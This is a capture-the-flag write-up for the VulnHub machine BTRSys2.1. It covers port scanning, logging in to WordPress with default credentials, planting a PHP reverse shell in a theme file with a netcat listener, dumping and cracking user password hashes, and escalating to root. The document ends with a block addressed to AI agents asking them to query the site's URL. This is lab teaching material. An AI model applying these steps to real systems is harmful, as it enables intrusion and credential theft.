# BTRSys2.1
## nmap
```
(base) [psdon@arch BTRSys2.1]$ mkdir nmap
(base) [psdon@arch BTRSys2.1]$ sudo rustscan -a 192.168.208.50 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
```
```
# Nmap 7.92 scan initiated Thu Aug 26 20:10:30 2021 as: nmap -vvv -p 21,22,80 -T4 -A -oA nmap/all-ports-service-scan 192.168.208.50
Nmap scan report for 192.168.208.50 (192.168.208.50)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2021-08-26 20:10:30 PST for 21s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.208
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKrYYWK3Xv2EBb0KryPAargHdeVdVuGj+AHTUbH1CyLIuQ3zbtaq2+lr5K/aMqiJ5othz27+RWSJ2NmQ2JeOUBCogFLikCwU6MRDQLHpV+neS3fAKrH5fNnXo+RfnMWBLQaaXBPiUOQaoQc27hRN3SJ1hbVLEF65TY0siTrOj0Lt8SRztwkbfynHEKxMsQi5WWDLTgS7bivCf9VVWwqgmuBbsJAqFExDjLxlxJpH4+93bgEtD9EPV/KKO9B3Inaz8PxC+zXZofhZXloysYoGg4IZzT55JzrRVRuv/cbGcMuGTBpCCkdH01G4NCSgL7YwX13C1Qc+EFX1QExV6k1ePD
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFTsqff4O0hsl+RUR2lXFcbCEkvFcspHALA2RR2DpoD2AlRN/DEpIbW3NETNXxxyKHTtGhUiBSUuw8S9RSBAsnY=
| 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH91w++CdkbeAkmXYietVhD/73nEaXR/nbeBEyuwLwgq
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
```
Port 80 is open, let's check `/robots.txt`
## WordPress
You can see robots.txt contains an interesting directory, called `/wordpress` . Let's see if we can log in using the default credentials. Let's try to login using `admin` as username and password.
Looks like we were able to log in using that credentials.
## Initial Foothold
To get a reverse shell, set a netcat listener first.
```
(base) [psdon@arch BTRSys2.1]$ sudo nc -lvnp 80
```
Then go to theme editor, and let's set the payload
Find a file you want to overwrite with your PHP reverse shell payload. In my case, I will be going to use the 404.php file.
Edit the file, paste your payload and save. You can use this [PHP reverse shell payload](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php), but you can use whatever you prefer.
Visit `/wordpress/wp-content/themes/twentyfourteen/404.php` and you should have received your shell in your terminal
## Post Exploitation
Let's check the wp-config.php
```
www-data@ubuntu:/var/www/html/wordpress$ less wp-config.php
```
I found credentials inside `wordpress` database.
```
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
| phpmyadmin |
| sys |
| wordpress |
+--------------------+
7 rows in set (0.01 sec)
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_wordpress |
+----------------------------+
| wp_abtest_experiments |
| wp_abtest_goal_hits |
| wp_abtest_goals |
| wp_abtest_ip_filters |
| wp_abtest_variation_views |
| wp_abtest_variations |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_masta_campaign |
| wp_masta_cronapi |
| wp_masta_list |
| wp_masta_reports |
| wp_masta_responder |
| wp_masta_responder_reports |
| wp_masta_settings |
| wp_masta_subscribers |
| wp_masta_support |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------+
26 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | root | a318e4507e5a74604aafb45e4741edd3 | btrisk | mdemir@btrisk.com | | 2017-04-24 17:37:04 | | 0 | btrisk |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | admin | ikaya@btrisk.com | | 2017-04-24 17:37:04 | | 4 | admin |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.01 sec)
```
I have cracked the hashed user\_pass of the root user using[ crackingstation.net](https://crackstation.net/)
The password we have cracked is `roottoor`
## Privilege Escalation
Let's try to login as root using the credentials we have cracked above.
```
www-data@ubuntu:/var/www/.ssh$ su
Password: roottoor
root@ubuntu:/var/www/.ssh#
```
You are now root!
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://psdon.gitbook.io/hackworld/writeup/vulnhub/linux/btrsys2.1.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.